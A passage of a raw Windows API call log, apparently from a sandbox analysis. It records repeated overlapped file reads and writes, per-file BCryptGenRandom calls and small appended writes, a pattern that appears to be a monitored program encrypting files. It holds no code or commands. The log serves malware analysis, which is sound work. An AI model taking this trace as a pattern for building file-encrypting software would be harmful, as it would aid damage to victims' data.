lpOverlapped=0x30efc18) returned 1 [0120.606] CloseHandle (hObject=0x13c0) returned 1 [0120.606] free (_Block=0x3df0008) [0120.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.708] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5516, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.712] CloseHandle (hObject=0x3bc) returned 1 [0120.712] free (_Block=0x3ef0008) [0120.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.713] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.738] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb758, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.755] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3d90, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.772] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.772] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.772] free (_Block=0x3e305b8) [0120.772] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.772] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.773] free (_Block=0x77d8b8) [0120.773] free (_Block=0x2071c20) [0120.773] free (_Block=0x77d7a8) [0120.773] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.784] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.798] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.811] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0120.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.821] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x14c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0120.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0120.838] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.838] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.838] free (_Block=0x3e305b8) [0120.838] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.838] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.838] free (_Block=0x77d8b8) [0120.838] free (_Block=0x2071c20) [0120.838] free (_Block=0x77d7a8) [0120.838] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.849] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.849] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0120.854] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x136a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.858] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.147] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.159] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0121.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.163] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b11, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0121.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0121.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0121.186] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.186] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.186] free (_Block=0x3e305b8) [0121.186] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.186] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.186] free (_Block=0x1fa91d0) [0121.186] free (_Block=0x77d7a8) [0121.186] free (_Block=0x1fa90b8) [0121.186] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0121.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.187] CloseHandle (hObject=0x3bc) returned 1 [0121.188] free (_Block=0x1ff1e60) [0121.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0121.188] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0121.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.180] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0124.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0124.190] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.190] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.190] free (_Block=0x3e305b8) [0124.190] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.190] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.191] free (_Block=0x1fa91d0) [0124.191] free (_Block=0x77d7a8) [0124.191] free (_Block=0x1fa90b8) [0124.191] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0124.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.204] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.211] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x5fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0124.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.216] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.235] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xab74, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0124.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0124.249] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x462c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0124.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.366] CloseHandle (hObject=0x308) returned 1 [0138.366] free (_Block=0x3df0008) [0138.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.372] CloseHandle (hObject=0xec) returned 1 [0138.372] free (_Block=0x1ff1e60) [0138.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.381] CloseHandle (hObject=0x170) returned 1 [0138.381] free (_Block=0x3d70450) [0138.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.384] CloseHandle (hObject=0x338) returned 1 [0138.384] free (_Block=0x3e70008) [0138.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.388] CloseHandle (hObject=0x3cc) returned 1 [0138.388] free (_Block=0x3ef0008) [0138.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.396] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.397] free (_Block=0x3e305b8) [0138.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.397] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.397] free (_Block=0x1fa91d0) [0138.397] free (_Block=0x77d7a8) [0138.397] free (_Block=0x1fa90b8) [0138.397] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.398] CloseHandle (hObject=0x308) returned 1 [0138.398] free (_Block=0x3df0008) [0138.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.411] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.411] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.411] free (_Block=0x3e305b8) [0138.411] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.411] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.411] free (_Block=0x1fa91d0) [0138.411] free (_Block=0x77d7a8) [0138.411] free (_Block=0x1fa90b8) [0138.411] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.419] CloseHandle (hObject=0xec) returned 1 [0138.419] free (_Block=0x1ff1e60) [0138.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.427] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1434, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.540] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.551] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.565] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x4b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 